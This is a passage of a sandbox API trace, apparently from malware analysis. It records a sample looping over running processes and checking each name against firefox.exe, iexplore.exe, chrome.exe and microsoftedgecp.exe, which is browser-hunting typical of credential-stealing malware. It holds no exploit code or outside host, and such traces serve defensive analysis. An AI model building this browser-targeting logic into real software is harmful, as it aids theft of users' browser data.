(lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0257.855] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.855] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0257.856] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0257.856] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0257.856] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0257.856] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.856] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0257.856] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0257.856] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0257.856] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0257.856] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.857] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0257.857] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0257.857] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0257.857] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0257.857] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.857] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0257.858] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0257.858] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0257.858] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0257.858] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.858] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0257.858] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0257.858] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0257.858] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0257.858] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.858] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0257.859] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0257.859] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0257.859] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0257.859] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.859] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0257.859] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0257.859] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0257.859] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0257.859] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.859] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0257.860] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0257.860] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0257.860] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0257.860] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.860] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0257.860] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0257.860] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0257.861] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0257.861] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.861] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0257.861] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0257.861] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0257.861] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0257.861] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.861] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0257.862] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0257.862] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0257.862] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0257.862] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.862] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0257.862] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0257.862] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0257.862] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0257.862] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.862] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0257.863] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0257.863] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0257.863] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0257.863] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.863] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0257.863] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0257.864] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0257.864] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0257.864] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.864] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0257.864] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0257.864] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0257.864] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0257.864] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.864] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0257.865] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0257.865] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0257.865] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0257.865] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.865] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0257.865] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0257.865] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0257.865] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0257.865] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.865] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.866] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.866] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.866] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.866] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.866] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0257.866] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0257.866] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0257.866] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0257.866] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.866] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.867] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.867] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.867] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.867] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.867] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0257.867] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0257.867] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0257.867] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0257.868] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.868] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.868] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0257.868] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0257.868] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0257.868] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.868] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0257.869] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0257.869] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0257.869] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0257.869] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.869] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.869] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0257.869] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0257.869] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0257.869] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.869] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.870] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0257.870] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0257.870] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0257.870] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.870] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.870] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0257.870] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0257.870] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0257.870] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.870] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.871] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0257.871] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0257.871] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0257.871] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.871] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0257.871] CloseHandle (hObject=0xd4) returned 1 [0257.871] Sleep (dwMilliseconds=0x3e8) [0258.898] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0258.900] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.900] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0258.901] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0258.901] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0258.901] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0258.901] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0258.901] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0258.901] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0258.901] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0258.901] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0258.901] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0258.902] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0258.902] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0258.902] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0258.902] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.902] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.902] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0258.902] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0258.902] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0258.902] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.902] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0258.903] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0258.903] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0258.903] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0258.903] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.903] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0258.903] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0258.903] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0258.903] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0258.903] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.903] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0258.904] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0258.904] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0258.904] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0258.904] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.904] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0258.904] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0258.904] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0258.904] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0258.904] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.905] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0258.905] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0258.905] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0258.905] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0258.905] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.905] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0258.906] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0258.906] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0258.906] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0258.906] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.906] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.906] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.906] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.906] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.906] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.906] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.907] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.907] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.907] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.907] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.907] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.907] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.907] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.907] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.907] lstrcmpiA (lpString1="svchost.exe", 